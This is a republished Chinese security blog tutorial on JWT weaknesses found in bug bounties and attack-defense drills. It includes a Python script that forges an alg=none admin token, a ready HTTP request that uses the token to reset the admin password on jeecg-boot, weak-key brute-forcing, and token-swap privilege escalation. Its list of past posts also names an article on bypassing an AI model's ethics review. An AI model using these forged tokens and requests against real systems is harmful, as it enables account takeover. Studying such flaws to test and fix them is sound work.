2026-05-16 04:33:41 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 该文档深入探讨JWT安全漏洞与渗透测试技巧，重点分析空加密算法漏洞、弱密钥爆破及垂直越权三大实战场景。作者结合攻防演练案例演示漏洞利用过程，提供Python脚本生成恶意JWT、Burp插件自动化检测等可操作方案，并强调漏洞组合利用可提升渗透效率。文章附有工具使用指南与SRC/EDU平台实战经验总结。 综合评分： 75 文章分类： WEB安全,漏洞分析,渗透测试,实战经验,安全工具

cover_image

“深入探究JWT：解锁身份验证的挖洞小技巧”

原创

湘南第一深情湘南第一深情

湘安无事

2026年5月9日 23:55 湖南

在小说阅读器读本章

去阅读

声明：由于传播、利用本公众号湘安无事所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。如有侵权烦请告知，我们会立即删除并致歉。谢谢！

前言

什么是jwt？简单来说相当于加密的cookies，我们将从认识JWT到实战案例讲解到burp插件使用全面让深情哥带你了解一下。也有视频讲解，b站关注”深情哥-湘安无事”。

JWT（JSON&nbsp;Web&nbsp;Token）是一种开放标准（RFC&nbsp;7519），它定义了一种紧凑且自包含的方式，用于在各方之间作为&nbsp;JSON&nbsp;对象安全地传输信息。这些信息可以被验证和信任，因为它是经过数字签名的。JWT&nbsp;可以使用&nbsp;HMAC&nbsp;算法或者是&nbsp;RSA&nbsp;的公钥/私钥对进行签名。JWT通常由三部分组成，用.符号分隔开来：Header（头部）：包含了令牌的类型和签名算法信息。Payload（载荷）：包含了声明（claims），这些声明是关于实体（通常是用户）和其他数据的。Signature（签名）：使用头部中指定的算法以及一个密钥对头部和载荷进行签名，以确保数据的完整性和验证身份。JWT&nbsp;可以用于用户身份验证和信息传递，在&nbsp;Web&nbsp;开发中广泛应用于身份验证和授权机制。

认识JWT，一般都是再请求头里面：Authorization: Bearer

其实就相当于cookies认证，这里只不过JWT认证

JWT相关的利用骚操作

都是来自深情哥两年半经验遇到的一些经验

jwt的空加密算法漏洞

场景发生再深情哥第一次打攻防的时候，遇到的一个jeecg的网站

打开网站一眼就感觉是jeecg的

测了发现没有历史漏洞，弱口令也没有，当时就想着完蛋了要gg了，只能去下载一个源码看看能不能审计个新的day,当时太菜了根本不会审计java,就搭了个测试环境黑盒看看，无意间看到了jwt

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NTU5MTQxNzcsInVzZXJuYW1lIjoiYWRtaW4ifQ.td8tjxD0TKTi2hVcd-kxSt2m4kVAxzr4B9Df5r6rUJU

就想着会不会有jwt的漏洞，然后我直接一手jwt的空加密算法漏洞，脚本如下

import&nbsp;timeimport&nbsp;jwt#headerheader = {&nbsp; &nbsp;&nbsp;"typ":&nbsp;"JWT",&nbsp; &nbsp;&nbsp;"alg":&nbsp;"none"    }#payloadpayload = {&nbsp;&nbsp;"claimList": {&nbsp; &nbsp;&nbsp;"roles": [&nbsp; &nbsp; &nbsp;&nbsp;"admin",&nbsp; &nbsp; &nbsp;&nbsp;"user"&nbsp; &nbsp; ],&nbsp; &nbsp;&nbsp;"userid":&nbsp;"admin"&nbsp; },&nbsp;&nbsp;"exp":&nbsp;1728784080,&nbsp;&nbsp;"iat":&nbsp;1728784080,&nbsp;&nbsp;"sub":&nbsp;"1"}jwt_token = jwt.encode(payload,key=None,algorithm=None,headers=header).encode('utf-8'). decode('utf-8')&nbsp;#输出print("jwtToken: "+jwt_token)

生成内容为

jwtToken:&nbsp;eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJjbGFpbUxpc3QiOnsicm9sZXMiOlsiYWRtaW4iLCJ1c2VyIl0sInVzZXJpZCI6ImFkbWluIn0sImV4cCI6MTcyODc4NDA4MCwiaWF0IjoxNzI4Nzg0MDgwLCJzdWIiOiIxIn0.

然后直接再测试环境拿了一个修改管理员密码的接口进行伪造jwt配合利用

PUT /jeecg-boot/sys/user/changePassword HTTP/1.1X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJjbGFpbUxpc3QiOnsicm9sZXMiOlsiYWRtaW4iLCJ1c2VyIl0sInVzZXJpZCI6ImFkbWluIn0sImV4cCI6MTcyODc4NDA4MCwiaWF0IjoxNzI4Nzg0MDgwLCJzdWIiOiIxIn0.{"username":"admin","password":"123456!","confirmpassword":"123456!"}

挖槽直接修改成功，还是管理员权限直接拿下2500分

登录发现直接超级管理员权限

jwt的弱密钥漏洞

刚刚说到JWT的第三部分的签名，其实相当于就是密钥,通过密钥结合算法才加密成下面的jwt

eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJjbGFpbUxpc3QiOnsicm9sZXMiOlsiYWRtaW4iLCJ1c2VyIl0sInVzZXJpZCI6ImFkbWluIn0sImV4cCI6MTcyODc4NDA4MCwiaWF0IjoxNzI4Nzg0MDgwLCJzdWIiOiIxIn0.PX3cPs9Sz02KUVGbQjoeV8juZhSi65VzBtX3j2d7zkBANLbutsZZIJcfr1XLHasCbOfajdKOZyTekBRJnHNOwg

直接掏出无锋大佬写的工具即可

爆破出密钥为secret_key

怎么利用？有两个点，要么伪造jwt登录或者改密码，要么就越权。

但是下面这种就可能不能达到高危了我们看学员发给我的例子

像这种他不是单一因子认证的懂吧所以越权比较有难度，只能评个中低，除非你通过下面这些因子爆破出管理员jwt并且登录利用即可

jwt的垂直越权漏洞

前提一般都是有两个不同的账号，我们看个证书站的报告，学员挖的，一般都是用来水洞和src的，edu案例如下：

低权限账号没有该操作:

但是登录管理员账户并且点击某项编辑用户信息的操作，然后把cookie换成低权限账号的cookie，也可成功访问，证明存在垂直越权:

src案例：价值3000的报告很简单水洞的

输入测试账号 test 123456aA!

此时权限只有数据可视化权限

直接找到管理员返回敏感信息的接口/api/log/list ，token用低权限账户构造数据包如下

直接越权查看管理员的功能

JWT的burp插件(sqg内部培训-JWT爆破工具二开)实现

工具放到纷传了，深情版培训学员和湘安无事成员可以找我领取测试，后续插件成熟会开放。

1.主动使用教程

成功是如图：

2.被动扫描

插件识别到jwt会自动爆破

可以自己定义字典，用无影的key即可

往期文章

敏感信息泄露漏洞总结：深情哥提醒你aksk正在“裸奔”

985–edu证书案例之有意思的报告

五一弯道超车！深情版Edu+SRC培训限时低价，文末免费抽奖(两份kfc+五个无影激活码)

记母校漏洞测试一次waf绕过经历

Codex-AI 道德审查绕过进行js逆向

究极无敌的srcAI-xss手法（快看过来）

记一次差点进编制的漏洞测试

新版微信强开f12和新版本微信反编译

湘安无事2025团队和培训总结-福利抽奖

985证书漏洞越权成为教授 + EDU/RCE漏洞实战解析｜湘安内部平台月榜 TOP3 案例

服务号存在注入之有意思的edu漏洞

湘安无事之湘潭大学冬令营总结

赏金src报告分享&&edu证书站漏洞分享

edu小灶案例之泄露上w敏感信息&有意思的证书站报告案例

学员投稿之edu漏洞的JS逆向解密导致任意密码重置

最近学员小灶总结之双十二特惠

卡顿页面导致三本edu证书现世之学员案例分享

看完这场EDU通杀刷屏，连我自己都沉默了

edu证书站挖掘之学员分享案例

如何快速挖掘低微漏洞-项目挖掘总结版

公众号接管漏洞之偷偷加小姐姐微信

辅助学员审计案例-php代码审计

学员-补天800赏金报告分享

从js逆向到sql注入waf绕过到net审计-edu证书漏洞

空白页面引起的高危src漏洞-再次绕过

空白页面引起的高危src漏洞

难忘的优惠劵漏洞(深情哥破防版)

什么？又日母校？竟然还有表扬信

sql server注入靶场搭建

记一次学校ai沦为我的宠物之拿下edu证书

疯狂星期四两本证书漏洞合集

湘安无事之深情哥版edu+src培训

记两次js逆向拿下985证书站(学员投稿)~

重生之我在教育园暴打小朋友

某医院微信小程序签名机制绕过分析

记二次帮学员拿下edu证书站

记一次难忘的net直播审计

记一次小米-root+简易app抓包(新手)

记一次带学员渗透母校

同学，你试过交edu漏洞交两天两夜嘛

手把手带学员拿下浙大edu证书

记一次手把手带学员拿下600赏金

深情版edu+src培训讲解(3000)

最后总结

感兴趣的可以联系深情哥进群，有公开课会在群里面通知，包括审计和src。edu邀请码获取，咨询问题，hvv渠道推荐，nisp和cisp考证都可以联系深情哥。

内部edu+src培训，包括src挖掘，edu挖掘，小程序逆向，js逆向，app渗透，导师是挖洞过40w的奥特曼深情哥，edu上千分的带头大哥！！！联系深情哥即可。

#

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：湘安无事湘南第一深情湘南第一深情《“深入探究JWT：解锁身份验证的挖洞小技巧”》